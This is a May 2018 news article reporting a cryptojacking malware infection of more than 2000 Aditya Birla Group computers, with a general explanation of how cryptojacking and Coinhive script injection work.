Cryptojacking Malware Infected Over 2000 Aditya Birla Group Computers Last Month

May 11 2018

With the rise in cryptocurrencies, crypto-crime is on the rise too. Hackers are making use of cryptojacking - a technique that involves the use of a malware which mines for cryptocurrencies on an unsuspecting user’s computer. In one of the largest cryptojacking attacks in India, over 2000 computers of various companies of the Aditya Birla Group were affected by a cryptojacking malware. 

Reports from the Economic Times indicate that this attack was first noticed about a month ago and then began to spread across the company’s network. It was first spotted in an overseas subsidiary of the Aditya Birla Group. However, since it was detected, the company’s internal security team started off with an investigation and have since been trying to stop this attack. They have managed to limit the spread of the malware. A statement sent to ET reads:

“Aditya Birla Group has advance threat management systems that are constantly monitoring and protecting business critical applications and infrastructure in all Businesses. Recently, the advance threat detection systems of our Group alerted us of suspicious activity on some desktop systems. Based on this, our internal team immediately carried out an investigation and deployed countermeasures to isolate and eliminate the cause of this activity.“

Aditya Birla Group is one of the biggest business houses in India which operates several businesses. This is the first organized cryptojacking attack on an Indian company - and at such a large scale too. 

Cryptojacking in India

While this is the first attack of this scale targeted at an Indian firm, this is certainly not the first time that it is happening. The e-newspaper websites of the Deccan Chronicle and the Asian Age - two popular newspapers from India were also affected with the Coinhive cryprojacking script - mining for cryptocurrencies using the processing power of their visitors.  

Understanding Cryptojacking

Cryptojacking is a new-age cyber-crime where the intention of the hackers is not to steal data or to damage the user’s computer - instead, the hackers make use of the processing power of the CPU of the affected users to mine for cryptocurrencies - usually Monero. On most occasions, these attacks are not isolated incidents but affect a large number of computers at once. 

There has been a marked rise in cryptojacking incidents in the past. Cryptojacking can be performed via either spreading malware which installs itself in a computer and mines for cryptocurrencies - or it can be done by injecting a cryptocurrency mining script on a website (usually the Coinhive script). 

Cryptojacking has been becoming increasingly common - with even the likes of YouTube being affected by it when someone injected a Coinhive code on a YouTube ad. Thousands of websites of the UK government were affected by it - and some even suspected that the government of Egypt was using a cryptojacking attack on their own citizens! Reports from March indicated that over 50,000 websites are currently affected by this issue. 

With organizations such as the Aditya Birla Group now in the crosshairs of the hackers, business houses around the world need to ramp up their security to ensure they stay protected. 

Comments